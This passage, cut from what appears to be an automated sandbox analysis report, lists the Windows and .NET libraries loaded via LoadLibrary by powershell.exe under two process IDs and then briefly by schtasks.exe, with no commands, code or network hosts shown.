%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\wintrust.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wintrust.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\amsi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.d (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\05765f777020deeddc8ad54b48343b9c\\Microsoft.PowerShell.Security (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\Microsoft.Management.Infrastr (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\3d760b4a3260a41ef84a3fd866780980\\System.Transactions.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\e7d6ed984300c7212c6e682c4f730b1e\\System.Numerics.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter shlwapi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.M870d558a#\\7ceb6b903321c16b12386a8df1be50f9\\Microsoft.Management.Infrastr (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pae3498d9#\\8dcf1daed985f481eed5cca9d2945c18\\Microsoft.PowerShell.Commands (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\System.Configuration.Install. (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINTRUST.DLL (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\cryptnet.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter cryptnet.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SensApi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINHTTP.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wshtcpip (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wship6.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter profapi.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00004784)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\Microsoft.PowerShell.ConsoleH (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\System.Management.Automation. (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automatio (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\wintrust.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wintrust.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\amsi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter amsi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.d (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\05765f777020deeddc8ad54b48343b9c\\Microsoft.PowerShell.Security (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\f0821980bfe2fc8375ccfc37dbe6e9d8\\Microsoft.Management.Infrastr (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\3d760b4a3260a41ef84a3fd866780980\\System.Transactions.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\e7d6ed984300c7212c6e682c4f730b1e\\System.Numerics.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter shlwapi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.M870d558a#\\7ceb6b903321c16b12386a8df1be50f9\\Microsoft.Management.Infrastr (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pae3498d9#\\8dcf1daed985f481eed5cca9d2945c18\\Microsoft.PowerShell.Commands (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\System.Configuration.Install. (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINTRUST.DLL (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\cryptnet.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter cryptnet.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SensApi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WINHTTP.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wshtcpip (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter wship6.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter profapi.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00004640)\n \"powershell.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00004640)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004424)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004424)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004424)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004424)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\schtasks.exe (UID: 00000000-00004424)\n \"schtasks.exe\" called 